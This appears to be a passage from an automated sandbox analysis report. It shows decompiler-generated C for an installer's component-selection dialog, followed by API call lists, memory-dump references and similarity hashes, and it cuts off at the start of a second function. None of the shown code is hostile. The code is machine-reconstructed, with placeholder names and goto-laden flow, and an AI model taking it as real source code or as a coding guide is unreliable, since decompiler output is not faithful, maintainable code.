                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004046CA(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				struct HWND__* _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				long _v28;
                                                                                                                          				int _v32;
                                                                                                                          				signed int _v40;
                                                                                                                          				int _v44;
                                                                                                                          				signed int* _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				long _v68;
                                                                                                                          				void* _v72;
                                                                                                                          				intOrPtr _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				void* _v84;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				struct HWND__* _t182;
                                                                                                                          				intOrPtr _t183;
                                                                                                                          				int _t189;
                                                                                                                          				int _t196;
                                                                                                                          				intOrPtr _t198;
                                                                                                                          				long _t202;
                                                                                                                          				signed int _t206;
                                                                                                                          				signed int _t217;
                                                                                                                          				void* _t220;
                                                                                                                          				void* _t221;
                                                                                                                          				int _t227;
                                                                                                                          				intOrPtr _t231;
                                                                                                                          				signed int _t232;
                                                                                                                          				signed int _t233;
                                                                                                                          				signed int _t240;
                                                                                                                          				signed int _t242;
                                                                                                                          				signed int _t245;
                                                                                                                          				signed int _t247;
                                                                                                                          				struct HBITMAP__* _t250;
                                                                                                                          				void* _t252;
                                                                                                                          				char* _t268;
                                                                                                                          				signed char _t269;
                                                                                                                          				long _t274;
                                                                                                                          				int _t280;
                                                                                                                          				signed int* _t281;
                                                                                                                          				int _t282;
                                                                                                                          				long _t283;
                                                                                                                          				signed int* _t284;
                                                                                                                          				int _t285;
                                                                                                                          				long _t286;
                                                                                                                          				signed int _t287;
                                                                                                                          				long _t288;
                                                                                                                          				signed int _t291;
                                                                                                                          				int _t294;
                                                                                                                          				signed int _t298;
                                                                                                                          				signed int _t300;
                                                                                                                          				signed int _t302;
                                                                                                                          				intOrPtr _t309;
                                                                                                                          				int* _t310;
                                                                                                                          				void* _t311;
                                                                                                                          				int _t315;
                                                                                                                          				int _t316;
                                                                                                                          				int _t317;
                                                                                                                          				signed int _t318;
                                                                                                                          				void* _t320;
                                                                                                                          				void* _t328;
                                                                                                                          				void* _t331;
                                                                                                                          
                                                                                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                          				_t182 = GetDlgItem(_a4, 0x408);
                                                                                                                          				_t280 =  *0x423ea8; // 0x486a5c
                                                                                                                          				_t320 = SendMessageA;
                                                                                                                          				_v8 = _t182;
                                                                                                                          				_t183 =  *0x423e90; // 0x4868b0
                                                                                                                          				_t315 = 0;
                                                                                                                          				_v32 = _t280;
                                                                                                                          				_v20 = _t183 + 0x94;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L23:
                                                                                                                          					__eflags = _a8 - 0x405;
                                                                                                                          					if(_a8 != 0x405) {
                                                                                                                          						_t289 = _a16;
                                                                                                                          					} else {
                                                                                                                          						_a12 = _t315;
                                                                                                                          						_t289 = 1;
                                                                                                                          						_a8 = 0x40f;
                                                                                                                          						_a16 = 1;
                                                                                                                          					}
                                                                                                                          					__eflags = _a8 - 0x4e;
                                                                                                                          					if(_a8 == 0x4e) {
                                                                                                                          						L28:
                                                                                                                          						__eflags = _a8 - 0x413;
                                                                                                                          						_v16 = _t289;
                                                                                                                          						if(_a8 == 0x413) {
                                                                                                                          							L30:
                                                                                                                          							__eflags =  *0x423e99 & 0x00000002;
                                                                                                                          							if(( *0x423e99 & 0x00000002) != 0) {
                                                                                                                          								L41:
                                                                                                                          								__eflags = _v16 - _t315;
                                                                                                                          								if(_v16 != _t315) {
                                                                                                                          									_t232 = _v16;
                                                                                                                          									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                                                                                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                                                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                                                          									}
                                                                                                                          									_t233 = _v16;
                                                                                                                          									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                                                                                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                                                          										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                                                                                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                                                          											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                                                                                          											 *_t284 =  *_t284 & 0xffffffdf;
                                                                                                                          											__eflags =  *_t284;
                                                                                                                          										} else {
                                                                                                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L48;
                                                                                                                          							}
                                                                                                                          							__eflags = _a8 - 0x413;
                                                                                                                          							if(_a8 == 0x413) {
                                                                                                                          								L33:
                                                                                                                          								__eflags = _a8 - 0x413;
                                                                                                                          								_t289 = 0 | _a8 != 0x00000413;
                                                                                                                          								_t240 = E0040464A(_v8, _a8 != 0x413);
                                                                                                                          								__eflags = _t240 - _t315;
                                                                                                                          								if(_t240 >= _t315) {
                                                                                                                          									_t93 = _t280 + 8; // 0x8
                                                                                                                          									_t310 = _t240 * 0x418 + _t93;
                                                                                                                          									_t289 =  *_t310;
                                                                                                                          									__eflags = _t289 & 0x00000010;
                                                                                                                          									if((_t289 & 0x00000010) == 0) {
                                                                                                                          										__eflags = _t289 & 0x00000040;
                                                                                                                          										if((_t289 & 0x00000040) == 0) {
                                                                                                                          											_t298 = _t289 ^ 0x00000001;
                                                                                                                          											__eflags = _t298;
                                                                                                                          										} else {
                                                                                                                          											_t300 = _t289 ^ 0x00000080;
                                                                                                                          											__eflags = _t300;
                                                                                                                          											if(_t300 >= 0) {
                                                                                                                          												_t298 = _t300 & 0xfffffffe;
                                                                                                                          											} else {
                                                                                                                          												_t298 = _t300 | 0x00000001;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										 *_t310 = _t298;
                                                                                                                          										E0040117D(_t240);
                                                                                                                          										_t242 =  *0x423e98; // 0x80
                                                                                                                          										_t289 = 1;
                                                                                                                          										_a8 = 0x40f;
                                                                                                                          										_t245 =  !_t242 >> 0x00000008 & 1;
                                                                                                                          										__eflags = _t245;
                                                                                                                          										_a12 = 1;
                                                                                                                          										_a16 = _t245;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							_t289 = _a16;
                                                                                                                          							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                                                                                          							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                                                                                          						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                                                                                          							goto L48;
                                                                                                                          						}
                                                                                                                          						goto L30;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _a8 - 0x413;
                                                                                                                          						if(_a8 != 0x413) {
                                                                                                                          							L48:
                                                                                                                          							__eflags = _a8 - 0x111;
                                                                                                                          							if(_a8 != 0x111) {
                                                                                                                          								L56:
                                                                                                                          								__eflags = _a8 - 0x200;
                                                                                                                          								if(_a8 == 0x200) {
                                                                                                                          									SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                                                          								}
                                                                                                                          								__eflags = _a8 - 0x40b;
                                                                                                                          								if(_a8 == 0x40b) {
                                                                                                                          									_t220 =  *0x420454;
                                                                                                                          									__eflags = _t220 - _t315;
                                                                                                                          									if(_t220 != _t315) {
                                                                                                                          										ImageList_Destroy(_t220);
                                                                                                                          									}
                                                                                                                          									_t221 =  *0x42046c;
                                                                                                                          									__eflags = _t221 - _t315;
                                                                                                                          									if(_t221 != _t315) {
                                                                                                                          										GlobalFree(_t221);
                                                                                                                          									}
                                                                                                                          									 *0x420454 = _t315;
                                                                                                                          									 *0x42046c = _t315;
                                                                                                                          									 *0x423ee0 = _t315;
                                                                                                                          								}
                                                                                                                          								__eflags = _a8 - 0x40f;
                                                                                                                          								if(_a8 != 0x40f) {
                                                                                                                          									L86:
                                                                                                                          									__eflags = _a8 - 0x420;
                                                                                                                          									if(_a8 == 0x420) {
                                                                                                                          										__eflags =  *0x423e99 & 0x00000001;
                                                                                                                          										if(( *0x423e99 & 0x00000001) != 0) {
                                                                                                                          											__eflags = _a16 - 0x20;
                                                                                                                          											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                          											__eflags = _t189;
                                                                                                                          											_t316 = _t189;
                                                                                                                          											ShowWindow(_v8, _t316);
                                                                                                                          											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									goto L89;
                                                                                                                          								} else {
                                                                                                                          									E004011EF(_t289, _t315, _t315);
                                                                                                                          									__eflags = _a12 - _t315;
                                                                                                                          									if(_a12 != _t315) {
                                                                                                                          										E0040140B(8);
                                                                                                                          									}
                                                                                                                          									__eflags = _a16 - _t315;
                                                                                                                          									if(_a16 == _t315) {
                                                                                                                          										L73:
                                                                                                                          										E004011EF(_t289, _t315, _t315);
                                                                                                                          										__eflags =  *0x423eac - _t315; // 0x1
                                                                                                                          										_v32 =  *0x42046c;
                                                                                                                          										_t196 =  *0x423ea8; // 0x486a5c
                                                                                                                          										_v60 = 0xf030;
                                                                                                                          										_v16 = _t315;
                                                                                                                          										if(__eflags <= 0) {
                                                                                                                          											L84:
                                                                                                                          											InvalidateRect(_v8, _t315, 1);
                                                                                                                          											_t198 =  *0x42365c; // 0x48b9e6
                                                                                                                          											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                                                                                          											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                                                                                          												E00404568(0x3ff, 0xfffffffb, E0040461D(5));
                                                                                                                          											}
                                                                                                                          											goto L86;
                                                                                                                          										} else {
                                                                                                                          											_t142 = _t196 + 8; // 0x486a64
                                                                                                                          											_t281 = _t142;
                                                                                                                          											do {
                                                                                                                          												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                                                          												__eflags = _t202 - _t315;
                                                                                                                          												if(_t202 != _t315) {
                                                                                                                          													_t291 =  *_t281;
                                                                                                                          													_v68 = _t202;
                                                                                                                          													__eflags = _t291 & 0x00000001;
                                                                                                                          													_v72 = 8;
                                                                                                                          													if((_t291 & 0x00000001) != 0) {
                                                                                                                          														_t151 =  &(_t281[4]); // 0x486a74
                                                                                                                          														_v72 = 9;
                                                                                                                          														_v56 = _t151;
                                                                                                                          														_t154 =  &(_t281[0]);
                                                                                                                          														 *_t154 = _t281[0] & 0x000000fe;
                                                                                                                          														__eflags =  *_t154;
                                                                                                                          													}
                                                                                                                          													__eflags = _t291 & 0x00000040;
                                                                                                                          													if((_t291 & 0x00000040) == 0) {
                                                                                                                          														_t206 = (_t291 & 0x00000001) + 1;
                                                                                                                          														__eflags = _t291 & 0x00000010;
                                                                                                                          														if((_t291 & 0x00000010) != 0) {
                                                                                                                          															_t206 = _t206 + 3;
                                                                                                                          															__eflags = _t206;
                                                                                                                          														}
                                                                                                                          													} else {
                                                                                                                          														_t206 = 3;
                                                                                                                          													}
                                                                                                                          													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                                                                                          													__eflags = _t294;
                                                                                                                          													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                                                          													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                                                                                          													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                                                          												}
                                                                                                                          												_v16 = _v16 + 1;
                                                                                                                          												_t281 =  &(_t281[0x106]);
                                                                                                                          												__eflags = _v16 -  *0x423eac; // 0x1
                                                                                                                          											} while (__eflags < 0);
                                                                                                                          											goto L84;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t282 = E004012E2( *0x42046c);
                                                                                                                          										E00401299(_t282);
                                                                                                                          										_t217 = 0;
                                                                                                                          										_t289 = 0;
                                                                                                                          										__eflags = _t282 - _t315;
                                                                                                                          										if(_t282 <= _t315) {
                                                                                                                          											L72:
                                                                                                                          											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                                                          											_a16 = _t282;
                                                                                                                          											_a8 = 0x420;
                                                                                                                          											goto L73;
                                                                                                                          										} else {
                                                                                                                          											goto L69;
                                                                                                                          										}
                                                                                                                          										do {
                                                                                                                          											L69:
                                                                                                                          											_t309 = _v20;
                                                                                                                          											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                                                                                          											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                                                                                          												_t289 = _t289 + 1;
                                                                                                                          												__eflags = _t289;
                                                                                                                          											}
                                                                                                                          											_t217 = _t217 + 1;
                                                                                                                          											__eflags = _t217 - _t282;
                                                                                                                          										} while (_t217 < _t282);
                                                                                                                          										goto L72;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags = _a12 - 0x3f9;
                                                                                                                          							if(_a12 != 0x3f9) {
                                                                                                                          								goto L89;
                                                                                                                          							}
                                                                                                                          							__eflags = _a12 >> 0x10 - 1;
                                                                                                                          							if(_a12 >> 0x10 != 1) {
                                                                                                                          								goto L89;
                                                                                                                          							}
                                                                                                                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                                                          							__eflags = _t227 - 0xffffffff;
                                                                                                                          							if(_t227 == 0xffffffff) {
                                                                                                                          								goto L89;
                                                                                                                          							}
                                                                                                                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                                                          							__eflags = _t283 - 0xffffffff;
                                                                                                                          							if(_t283 == 0xffffffff) {
                                                                                                                          								L54:
                                                                                                                          								_t283 = 0x20;
                                                                                                                          								L55:
                                                                                                                          								E00401299(_t283);
                                                                                                                          								SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                                                          								_a12 = 1;
                                                                                                                          								_a16 = _t315;
                                                                                                                          								_a8 = 0x40f;
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							_t231 = _v20;
                                                                                                                          							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                                                                                          							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                                                                                          								goto L55;
                                                                                                                          							}
                                                                                                                          							goto L54;
                                                                                                                          						}
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					 *0x423ee0 = _a4;
                                                                                                                          					_t247 =  *0x423eac; // 0x1
                                                                                                                          					_t285 = 2;
                                                                                                                          					_v28 = 0;
                                                                                                                          					_v16 = _t285;
                                                                                                                          					 *0x42046c = GlobalAlloc(0x40, _t247 << 2);
                                                                                                                          					_t250 = LoadBitmapA( *0x423e80, 0x6e);
                                                                                                                          					 *0x420460 =  *0x420460 | 0xffffffff;
                                                                                                                          					_v24 = _t250;
                                                                                                                          					 *0x420468 = SetWindowLongA(_v8, 0xfffffffc, E00404CCB);
                                                                                                                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                          					 *0x420454 = _t252;
                                                                                                                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                                                          					SendMessageA(_v8, 0x1109, _t285,  *0x420454);
                                                                                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                                          					}
                                                                                                                          					DeleteObject(_v24);
                                                                                                                          					_t286 = 0;
                                                                                                                          					do {
                                                                                                                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                                                          						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                                                          							if(_t286 != 0x20) {
                                                                                                                          								_v16 = _t315;
                                                                                                                          							}
                                                                                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FF(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                                                          						}
                                                                                                                          						_t286 = _t286 + 1;
                                                                                                                          					} while (_t286 < 0x21);
                                                                                                                          					_t317 = _a16;
                                                                                                                          					_t287 = _v16;
                                                                                                                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                                                          					_push(0x15);
                                                                                                                          					E00403D8F(_a4);
                                                                                                                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                                                          					_push(0x16);
                                                                                                                          					E00403D8F(_a4);
                                                                                                                          					_t318 = 0;
                                                                                                                          					_t288 = 0;
                                                                                                                          					_t328 =  *0x423eac - _t318; // 0x1
                                                                                                                          					if(_t328 <= 0) {
                                                                                                                          						L19:
                                                                                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						_t311 = _v32 + 8;
                                                                                                                          						_v24 = _t311;
                                                                                                                          						do {
                                                                                                                          							_t268 = _t311 + 0x10;
                                                                                                                          							if( *_t268 != 0) {
                                                                                                                          								_v60 = _t268;
                                                                                                                          								_t269 =  *_t311;
                                                                                                                          								_t302 = 0x20;
                                                                                                                          								_v84 = _t288;
                                                                                                                          								_v80 = 0xffff0002;
                                                                                                                          								_v76 = 0xd;
                                                                                                                          								_v64 = _t302;
                                                                                                                          								_v40 = _t318;
                                                                                                                          								_v68 = _t269 & _t302;
                                                                                                                          								if((_t269 & 0x00000002) == 0) {
                                                                                                                          									__eflags = _t269 & 0x00000004;
                                                                                                                          									if((_t269 & 0x00000004) == 0) {
                                                                                                                          										 *( *0x42046c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                          									} else {
                                                                                                                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_v76 = 0x4d;
                                                                                                                          									_v44 = 1;
                                                                                                                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                                          									_v28 = 1;
                                                                                                                          									 *( *0x42046c + _t318 * 4) = _t274;
                                                                                                                          									_t288 =  *( *0x42046c + _t318 * 4);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t318 = _t318 + 1;
                                                                                                                          							_t311 = _v24 + 0x418;
                                                                                                                          							_t331 = _t318 -  *0x423eac; // 0x1
                                                                                                                          							_v24 = _t311;
                                                                                                                          						} while (_t331 < 0);
                                                                                                                          						if(_v28 != 0) {
                                                                                                                          							L20:
                                                                                                                          							if(_v16 != 0) {
                                                                                                                          								E00403DC4(_v8);
                                                                                                                          								_t280 = _v32;
                                                                                                                          								_t315 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								goto L23;
                                                                                                                          							} else {
                                                                                                                          								ShowWindow(_v12, 5);
                                                                                                                          								E00403DC4(_v12);
                                                                                                                          								L89:
                                                                                                                          								return E00403DF6(_a8, _a12, _a16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L19;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x00404bf9
                                                                                                                          0x00404be9
                                                                                                                          0x00404beb
                                                                                                                          0x00404beb
                                                                                                                          0x00404c18
                                                                                                                          0x00404c18
                                                                                                                          0x00404c19
                                                                                                                          0x00404c25
                                                                                                                          0x00404c34
                                                                                                                          0x00404c34
                                                                                                                          0x00404c36
                                                                                                                          0x00404c39
                                                                                                                          0x00404c42
                                                                                                                          0x00404c42
                                                                                                                          0x00000000
                                                                                                                          0x00404bb5
                                                                                                                          0x00404b49
                                                                                                                          0x00404b54
                                                                                                                          0x00404b57
                                                                                                                          0x00404b5c
                                                                                                                          0x00404b5e
                                                                                                                          0x00404b60
                                                                                                                          0x00404b62
                                                                                                                          0x00404b72
                                                                                                                          0x00404b7c
                                                                                                                          0x00404b7e
                                                                                                                          0x00404b81
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404b64
                                                                                                                          0x00404b64
                                                                                                                          0x00404b64
                                                                                                                          0x00404b67
                                                                                                                          0x00404b6a
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6d
                                                                                                                          0x00404b6e
                                                                                                                          0x00404b6e
                                                                                                                          0x00000000
                                                                                                                          0x00404b64
                                                                                                                          0x00404b47
                                                                                                                          0x00404b2b
                                                                                                                          0x00404a62
                                                                                                                          0x00404a68
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a74
                                                                                                                          0x00404a78
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a88
                                                                                                                          0x00404a8a
                                                                                                                          0x00404a8d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a9f
                                                                                                                          0x00404aa1
                                                                                                                          0x00404aa4
                                                                                                                          0x00404aae
                                                                                                                          0x00404ab0
                                                                                                                          0x00404ab1
                                                                                                                          0x00404ab2
                                                                                                                          0x00404ac1
                                                                                                                          0x00404ac3
                                                                                                                          0x00404aca
                                                                                                                          0x00404acd
                                                                                                                          0x00000000
                                                                                                                          0x00404acd
                                                                                                                          0x00404aa6
                                                                                                                          0x00404aa9
                                                                                                                          0x00404aac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404aac
                                                                                                                          0x00000000
                                                                                                                          0x0040496c
                                                                                                                          0x0040471e
                                                                                                                          0x00404723
                                                                                                                          0x00404728
                                                                                                                          0x0040472d
                                                                                                                          0x0040472e
                                                                                                                          0x00404737
                                                                                                                          0x00404742
                                                                                                                          0x0040474d
                                                                                                                          0x00404753
                                                                                                                          0x00404761
                                                                                                                          0x00404776
                                                                                                                          0x0040477b
                                                                                                                          0x00404786
                                                                                                                          0x0040478f
                                                                                                                          0x004047a4
                                                                                                                          0x004047b5
                                                                                                                          0x004047c2
                                                                                                                          0x004047c2
                                                                                                                          0x004047c7
                                                                                                                          0x004047cd
                                                                                                                          0x004047cf
                                                                                                                          0x004047d2
                                                                                                                          0x004047d7
                                                                                                                          0x004047dc
                                                                                                                          0x004047de
                                                                                                                          0x004047de
                                                                                                                          0x004047fe
                                                                                                                          0x004047fe
                                                                                                                          0x00404800
                                                                                                                          0x00404801
                                                                                                                          0x00404806
                                                                                                                          0x00404809
                                                                                                                          0x0040480c
                                                                                                                          0x00404810
                                                                                                                          0x00404815
                                                                                                                          0x0040481a
                                                                                                                          0x0040481e
                                                                                                                          0x00404823
                                                                                                                          0x00404828
                                                                                                                          0x0040482a
                                                                                                                          0x0040482c
                                                                                                                          0x00404832
                                                                                                                          0x004048fc
                                                                                                                          0x0040490f
                                                                                                                          0x00000000
                                                                                                                          0x00404838
                                                                                                                          0x0040483b
                                                                                                                          0x0040483e
                                                                                                                          0x00404841
                                                                                                                          0x00404841
                                                                                                                          0x00404847
                                                                                                                          0x0040484d
                                                                                                                          0x00404850
                                                                                                                          0x00404856
                                                                                                                          0x00404857
                                                                                                                          0x0040485c
                                                                                                                          0x00404865
                                                                                                                          0x0040486c
                                                                                                                          0x0040486f
                                                                                                                          0x00404872
                                                                                                                          0x00404875
                                                                                                                          0x004048af
                                                                                                                          0x004048b1
                                                                                                                          0x004048da
                                                                                                                          0x004048b3
                                                                                                                          0x004048c0
                                                                                                                          0x004048c0
                                                                                                                          0x00404877
                                                                                                                          0x0040487a
                                                                                                                          0x00404889
                                                                                                                          0x00404893
                                                                                                                          0x0040489b
                                                                                                                          0x004048a2
                                                                                                                          0x004048aa
                                                                                                                          0x004048aa
                                                                                                                          0x00404875
                                                                                                                          0x004048e0
                                                                                                                          0x004048e1
                                                                                                                          0x004048e7
                                                                                                                          0x004048ed
                                                                                                                          0x004048ed
                                                                                                                          0x004048fa
                                                                                                                          0x00404915
                                                                                                                          0x00404919
                                                                                                                          0x00404936
                                                                                                                          0x0040493b
                                                                                                                          0x0040493e
                                                                                                                          0x0040493e
                                                                                                                          0x00000000
                                                                                                                          0x0040491b
                                                                                                                          0x00404920
                                                                                                                          0x00404929
                                                                                                                          0x00404cb6
                                                                                                                          0x00404cc8
                                                                                                                          0x00404cc8
                                                                                                                          0x00404919
                                                                                                                          0x00000000
                                                                                                                          0x004048fa
                                                                                                                          0x00404832

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 004046E1
                                                                                                                          • GetDlgItem.USER32 ref: 004046EE
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040473A
                                                                                                                          • LoadBitmapA.USER32 ref: 0040474D
                                                                                                                          • SetWindowLongA.USER32 ref: 00404767
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                                                                                                          • DeleteObject.GDI32(?), ref: 004047C7
                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                                                                                                          • GetWindowLongA.USER32 ref: 00404901
                                                                                                                          • SetWindowLongA.USER32 ref: 0040490F
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404920
                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                                                                                                          • GlobalFree.KERNEL32 ref: 00404B0C
                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                                                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                                                                                                          • GetDlgItem.USER32 ref: 00404CAD
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404CB4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N$\jH
                                                                                                                          • API String ID: 1638840714-3926256162
                                                                                                                          • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                                                          • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                                                          • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                                                          • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00404EB9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				long _v12;
                                                                                                                          				struct tagRECT _v28;
                                                                                                                          				void* _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				int _v44;
                                                                                                                          				int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				int _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				void* _v68;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
